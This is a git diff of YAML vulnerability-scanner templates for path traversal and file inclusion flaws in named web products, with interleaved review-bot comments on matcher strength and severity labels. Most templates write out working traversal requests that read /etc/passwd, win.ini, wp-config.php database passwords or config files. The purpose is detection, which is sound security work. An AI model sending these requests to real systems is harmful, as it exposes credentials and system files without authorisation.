+++ b/poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml @@ -3,8 +3,7 @@ info: name: Blue Ocean Excellence LFI author: pikpikcu severity: high - reference: - - https://blog.csdn.net/qq_41901122/article/details/116786883 + reference: https://blog.csdn.net/qq_41901122/article/details/116786883 tags: blue-ocean,lfi requests: - method: GET diff --git a/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml b/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml index eb6462cb09..2c607f3d82 100644 --- a/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml +++ b/poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml @@ -1,5 +1,4 @@ id: bullwark-momentum-lfi - info: name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion author: pikpikcu @@ -13,26 +12,22 @@ info: cvss-score: 7.5 cwe-id: CWE-22 metadata: - max-request: 1 version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-query: Bullwark fofa-query: "Bullwark" - tags: lfi,edb,bullwark - -http: + tags: bullwark,lfi +requests: - raw: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Referer: {{Hostname}} - matchers-condition: and matchers: - type: status status: - 200 - - type: regex regex: - "root:.*:0:0:" diff --git a/poc/local_file_inclusion/bullwark-momentum-lfi.yaml b/poc/local_file_inclusion/bullwark-momentum-lfi.yaml index 2c607f3d82..2731888240 100644 --- a/poc/local_file_inclusion/bullwark-momentum-lfi.yaml +++ b/poc/local_file_inclusion/bullwark-momentum-lfi.yaml 
@@ -1,35 +1,32 @@ id: bullwark-momentum-lfi + info: - name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion + name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal author: pikpikcu severity: high - description: Bullwark Momentum Series JAWS 1.0 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/47773 - - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - version: Bullwark Momentum Series Web Server JAWS/1.0 - shodan-query: Bullwark - fofa-query: "Bullwark" tags: bullwark,lfi + reference: https://www.exploit-db.com/exploits/47773 + +# Vendor Homepage: http://www.bullwark.net/ +# Version : Bullwark Momentum Series Web Server JAWS/1.0 +# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 +# Shodan Dork: https://www.shodan.io/search?query=Bullwark&page=1 +# fofa dork:-https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D + requests: - raw: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 X-Requested-With: XMLHttpRequest Referer: {{Hostname}} + matchers-condition: and matchers: - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/07/22 + - type: word + words: + - "root:" diff --git a/poc/local_file_inclusion/candidate-application-lfi-850.yaml b/poc/local_file_inclusion/candidate-application-lfi-850.yaml index cdc97aa53a..78c5990146 100644 --- a/poc/local_file_inclusion/candidate-application-lfi-850.yaml +++ b/poc/local_file_inclusion/candidate-application-lfi-850.yaml @@ -1,5 +1,4 @@ id: candidate-application-lfi - info: name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion author: dhiyaneshDK 
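Review bot: The matcher in bullwark-momentum-lfi.yaml is weakened from the regex `root:.*:0:0:` to the plain word `root:`, so any 200 response that merely contains the text "root:" is reported as a high-severity file disclosure. That raises the false-positive rate for whoever triages the results; I would keep the passwd-shaped pattern, `- type: regex` with `regex:` and `- "root:.*:0:0:"`. The hunk also moves the version and search-query metadata out of `metadata:` into free comments and hard-codes a `User-Agent` header, both of which make the template harder to maintain than the version it replaces.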
@@ -12,18 +11,15 @@ info: cvss-score: 8.6 cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi,wp - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd' - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/local_file_inclusion/churchope-lfi-915.yaml b/poc/local_file_inclusion/churchope-lfi-915.yaml index 3acac45bb1..a0f1465b83 100644 --- a/poc/local_file_inclusion/churchope-lfi-915.yaml +++ b/poc/local_file_inclusion/churchope-lfi-915.yaml @@ -1,15 +1,21 @@ id: churchope-lfi + info: - name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI) + name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion author: dhiyaneshDK severity: high - description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. - reference: https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 + description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. + reference: + - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 + classification: + cwe-id: CWE-22 tags: wordpress,wp-theme,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php' + matchers-condition: and matchers: - type: word @@ -18,6 +24,9 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and + - type: status status: - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml b/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml index d7e5ca13d2..8f38c36ece 100644 
--- a/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml +++ b/poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml @@ -1,4 +1,5 @@ id: dicoogle-pacs-lfi + info: name: Dicoogle PACS 2.5.0 - Directory Traversal author: 0x_akoko @@ -6,10 +7,12 @@ info: description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required. reference: https://cxsecurity.com/issue/WLB-2018070131 tags: windows,lfi,dicoogle + requests: - method: GET path: - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini" + stop-at-first-match: true matchers: - type: word diff --git a/poc/local_file_inclusion/elfinder-version-7205.yaml b/poc/local_file_inclusion/elfinder-version-7205.yaml index 61068856c5..f4b7ed1614 100644 --- a/poc/local_file_inclusion/elfinder-version-7205.yaml +++ b/poc/local_file_inclusion/elfinder-version-7205.yaml 
@@ -1,17 +1,27 @@ id: elfinder-version + info: - name: elFinder version extractor + name: elFinder 2.1.58 - Remote Code Execution author: idealphase - severity: info - description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. + severity: critical + description: elFinder 2.1.58 is vulnerable to remote code execution. This can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. + remediation: The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication. reference: - https://github.com/Studio-42/elFinder/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 + metadata: + max-request: 2 tags: tech,elfinder,oss -requests: + +http: - method: GET path: - "{{BaseURL}}/js/elfinder.min.js" - "{{BaseURL}}/js/elFinder.version.js" + matchers-condition: and matchers: - type: word @@ -20,12 +30,16 @@ requests: - "elFinder - file manager for web" - "elFinder.prototype.version =" condition: or + - type: status status: - 200 + extractors: - type: regex group: 1 regex: - '\* Version (.+) \(' - "elFinder.prototype.version = '([0-9.]+)';" + +# digest: 4a0a0047304502203fd42f01a45120d89be9dbccf02f4640a8984cb9e3354cfc80b84bd9e7f0b1c1022100b7a056d3efbf71d6eca1b3c8b3536b6bb31863d3092564f71ac5fadb59197072:922c64590222798bb761d5b6d8e72950 diff --git a/poc/local_file_inclusion/generic-linux-lfi.yaml b/poc/local_file_inclusion/generic-linux-lfi.yaml index cd0b3284c2..db8a2f11fa 100644 
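Review bot: The first elfinder-version-7205.yaml hunk relabels the template as `elFinder 2.1.58 - Remote Code Execution` with `severity: critical` and `cvss-score: 10`, but the matchers shown in the second hunk only look for the elFinder banner strings and a 200 status, and the extractor only prints the version. As written, every reachable elFinder install, including patched 2.1.59 and later, would be reported as a critical RCE. Either keep `severity: info` with the original name `elFinder version extractor`, or add a matcher that compares the extracted version before raising the severity. Two lines of the matcher sit between the two hunks and are not visible here, so confirm no version check lives there.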
--- a/poc/local_file_inclusion/generic-linux-lfi.yaml +++ b/poc/local_file_inclusion/generic-linux-lfi.yaml 
@@ -1,62 +1,45 @@ id: generic-linux-lfi - info: name: Generic Linux - Local File Inclusion - author: 0x71rex + author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley severity: high - description: Generic Linux is subject to local file Inclusion on searches for /etc/shells on passed URLs. - reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json + description: Generic Linux is subject to local file Inclusion on searches for /etc/passwd on passed URLs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - metadata: - max-request: 32 tags: linux,lfi,generic - -http: +requests: - method: GET path: - - "{{BaseURL}}/etc/shells" - - "{{BaseURL}}/..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells" - - "{{BaseURL}}/./../../../../../../../../../../etc/shells" - - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/shells" - - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/shells" - - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/shells" - - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/shells" - - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells" - - 
"{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/shells" - - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shells" - - "{{BaseURL}}/..///////..////..//////etc/shells" - - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells" - - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells" - - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00" - - "{{BaseURL}}/index.php?page=etc/shells" - - "{{BaseURL}}/index.php?page=etc/shells%00" - - "{{BaseURL}}/index.php?page=../../etc/shells" - - "{{BaseURL}}/index.php?page=....//....//etc/shells" - - "{{BaseURL}}/../../../../../../../../../etc/shells" - + - "{{BaseURL}}/etc/passwd" + - "{{BaseURL}}/..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/./../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" + - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" + - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" + - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" + - 
"{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" stop-at-first-match: true matchers: - - type: word - words: - - "# valid login shells" - - "/bin/sh" - - "/bin/ash" - - "/bin/bash" - condition: and + - type: regex + regex: + - "root:.*:0:0:" part: body + +# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/generic-windows-lfi.yaml b/poc/local_file_inclusion/generic-windows-lfi.yaml index f91fbe4dd3..ce9d6295ad 100644 --- a/poc/local_file_inclusion/generic-windows-lfi.yaml +++ b/poc/local_file_inclusion/generic-windows-lfi.yaml @@ -1,13 +1,9 @@ id: generic-windows-lfi info: - name: Windows - Local File Inclusion + name: Generic Windows based LFI Test author: mesaglio,sushantkamble severity: high - description: Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: Searches for /windows/win.ini on passed URLs tags: azure,windows,lfi,generic requests: - method: GET @@ -31,5 +27,3 @@ requests: - "extensions" condition: and part: body - -# Enhanced by mp on 2022/07/22 diff --git a/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml b/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml index 6f8dc53b3e..c0e7dbfcad 100644 --- a/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml +++ b/poc/local_file_inclusion/geovision-geowebserver-lfi-7595.yaml 
@@ -1,19 +1,22 @@ id: geowebserver-lfi + info: name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: - - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi + requests: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" + matchers-condition: and matchers: + - type: word words: - "bit app support" @@ -21,6 +24,7 @@ requests: - "extensions" condition: and part: body + - type: status status: - 200 diff --git a/poc/local_file_inclusion/health-check-lfi-7921.yaml b/poc/local_file_inclusion/health-check-lfi-7921.yaml index cf4e8e2ff9..c6e1a39f3c 100644 --- a/poc/local_file_inclusion/health-check-lfi-7921.yaml +++ b/poc/local_file_inclusion/health-check-lfi-7921.yaml 
@@ -1,23 +1,17 @@ id: health-check-lfi info: - name: WordPress Health Check & Troubleshooting <1.24 - Local File Inclusion + name: Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal author: DhiyaneshDK severity: high - description: WordPress Health Check & Troubleshooting prior to 1.2.4 is vulnerable to local file inclusion. Exploitation does require authentication. - remediation: Upgrade to version 1.2.4 or later. + description: The Health Check & Troubleshooting WordPress plugin was affected by an Authenticated Path Traversal security vulnerability. + remediation: Fixed in version 1.2.4 reference: - https://wpscan.com/vulnerability/5eecc4a7-0b44-495d-9352-78dccebfc72a - https://www.synacktiv.com/ressources/advisories/WordPress_Health_Check_1.2.3_Vulnerabilities.pdf - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan - metadata: - max-request: 2 + tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr -http: +requests: - raw: - | POST /wp-login.php HTTP/1.1 @@ -49,5 +43,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/08/05 diff --git a/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml b/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml index b626b6bce6..003dee02ce 100644 --- a/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml +++ b/poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml 
@@ -5,13 +5,13 @@ info: author: dhiyaneshDK severity: high description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation. - remediation: Upgrade to version 1.4 or later. - reference: https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ + reference: + - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 - cve-id: cwe-id: CWE-22 + remediation: Upgrade to version 1.4 or later. tags: wordpress,wp-plugin,lfi,wp requests: diff --git a/poc/local_file_inclusion/huawei-hg659-lfi.yaml b/poc/local_file_inclusion/huawei-hg659-lfi.yaml index 218c72de11..db6b65b82f 100644 --- a/poc/local_file_inclusion/huawei-hg659-lfi.yaml +++ b/poc/local_file_inclusion/huawei-hg659-lfi.yaml @@ -1,28 +1,26 @@ id: huawei-hg659-lfi + info: - name: HUAWEI HG659 - Local File Inclusion + name: HUAWEI HG659 LFI author: pikpikcu severity: high - description: HUAWEI HG659 is vulnerable to local file inclusion. - reference: + reference: | - https://twitter.com/sec715/status/1406782172443287559 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: lfi,huawei + requests: - method: GET path: - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/poc/local_file_inclusion/ibm-infoprint-lfi.yaml b/poc/local_file_inclusion/ibm-infoprint-lfi.yaml index 899fad8ae8..c7df45d4c4 100644 --- a/poc/local_file_inclusion/ibm-infoprint-lfi.yaml +++ b/poc/local_file_inclusion/ibm-infoprint-lfi.yaml 
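Review bot: In huawei-hg659-lfi.yaml the new `reference: |` turns the following `- https://twitter.com/sec715/status/1406782172443287559` line into a literal block string that starts with "- " instead of a one-item list, assuming the indentation is what the hunk suggests. Consumers that expect a list or a bare URL get neither; use `reference:` followed by the list item, or `reference: https://twitter.com/sec715/status/1406782172443287559`. The hunk also keeps `condition: and` on a matcher with a single regex, where it has no effect, and shortens the pattern to `root:.*:0:0`; `- "root:.*:0:0:"` stays consistent with the other passwd checks.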
@@ -1,5 +1,4 @@ id: ibm-infoprint-lfi - info: name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal author: harshbothra_ @@ -8,7 +7,6 @@ info: reference: - https://www.exploit-db.com/exploits/47835 tags: ibm,lfi,matrix,printer - requests: - method: GET path: diff --git a/poc/local_file_inclusion/jeewms-lfi.yaml b/poc/local_file_inclusion/jeewms-lfi.yaml index 14c348eee1..5346e10fc0 100644 --- a/poc/local_file_inclusion/jeewms-lfi.yaml +++ b/poc/local_file_inclusion/jeewms-lfi.yaml @@ -1,36 +1,28 @@ id: jeewms-lfi - info: name: JEEWMS LFI author: pikpikcu severity: high reference: https://mp.weixin.qq.com/s/ylOuWc8elD2EtM-1LiJp9g tags: jeewms,lfi - requests: - raw: - | #linux - GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 + GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - - | #windows GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - "\\[(font|extension|file)s\\]" condition: or part: body - - type: status status: - 200 diff --git a/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml b/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml index 0dedb521b3..c25375a9bb 100644 --- a/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml +++ b/poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml 
@@ -1,24 +1,19 @@ id: jinfornet-jreport-lfi - info: name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal author: 0x_Akoko severity: high reference: https://cxsecurity.com/issue/WLB-2020030151 tags: jreport,jinfornet,lfi - requests: - method: GET path: - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/local_file_inclusion/magicflow-lfi-8713.yaml b/poc/local_file_inclusion/magicflow-lfi-8713.yaml index f4e66ee647..08cf21df8d 100644 --- a/poc/local_file_inclusion/magicflow-lfi-8713.yaml +++ b/poc/local_file_inclusion/magicflow-lfi-8713.yaml @@ -1,4 +1,5 @@ id: magicflow-lfi + info: name: MagicFlow - Local File Inclusion author: gy741 @@ -6,16 +7,20 @@ info: description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. reference: https://www.seebug.org/vuldb/ssvid-89258 tags: magicflow,lfi + requests: - method: GET path: - "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd" - "{{BaseURL}}/msa/../../../../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:.*:0:0" + - type: status status: - 200 diff --git a/poc/local_file_inclusion/metinfo-lfi.yaml b/poc/local_file_inclusion/metinfo-lfi.yaml index 8c1189d33c..9a794bbcb0 100644 --- a/poc/local_file_inclusion/metinfo-lfi.yaml +++ b/poc/local_file_inclusion/metinfo-lfi.yaml 
@@ -1,23 +1,18 @@ id: metinfo-lfi info: - name: MetInfo <=6.1.0 - Local File Inclusion + name: MetInfo 6.0.0/6.1.0 LFI author: pikpikcu severity: high - description: MetInfo 6.0.0 through 6.1.0 is vulnerable to local file inclusion and allows remote unauthenticated attackers access to locally stored files and their content. - reference: - - https://paper.seebug.org/676/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://paper.seebug.org/676/ tags: metinfo,lfi + requests: - method: GET path: - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -29,5 +24,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/27 diff --git a/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml b/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml index 9d81afe4e4..7da00d4946 100644 --- a/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml +++ b/poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml @@ -16,5 +16,5 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body diff --git a/poc/local_file_inclusion/oracle-fatwire-lfi.yaml b/poc/local_file_inclusion/oracle-fatwire-lfi.yaml index 6038f21723..e014de6a11 100644 --- a/poc/local_file_inclusion/oracle-fatwire-lfi.yaml +++ b/poc/local_file_inclusion/oracle-fatwire-lfi.yaml 
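Review bot: In `poc/local_file_inclusion/metinfo-lfi.yaml` the new side drops `stop-at-first-match: true`, so all three `thumb.php` paths are requested even after one of them has already matched. Keep `stop-at-first-match: true` after the `path:` list so a scan stops at the first confirmed hit and sends no further traversal requests to the target. The same hunk also removes the `description` and the `classification` block (`cvss-score: 7.5`, `cwe-id: CWE-22`), which leaves triage with nothing but the `severity: high` label; I would restore both.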
@@ -2,15 +2,10 @@ id: oracle-fatwire-lfi info: name: Oracle Fatwire 6.3 - Path Traversal author: Bernardo Rodrigues @bernardofsr - severity: high - description: | - Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint. + severity: critical + description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint reference: - https://www.exploit-db.com/exploits/50167 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 tags: lfi,oracle,fatwire requests: - method: GET @@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml b/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml index a11b89cac1..68149be506 100644 --- a/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml +++ b/poc/local_file_inclusion/pacsone-server-lfi-9430.yaml @@ -1,23 +1,27 @@ id: pacsone-server-lfi - info: - name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal + name: PACSOne Server 6.6.2 - Local File Inclusion author: 0x_Akoko severity: high - reference: https://cxsecurity.com/issue/WLB-2018010303 + description: PACSOne Server 6.6.2 is vulnerable to local file inclusion via its integrated DICOM Web Viewer. + reference: + - https://cxsecurity.com/issue/WLB-2018010303 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: pacsone,lfi - requests: - method: GET path: - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 + +# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/phpwiki-lfi-9567.yaml b/poc/local_file_inclusion/phpwiki-lfi-9567.yaml index 8d310252a7..d48b733698 100644 
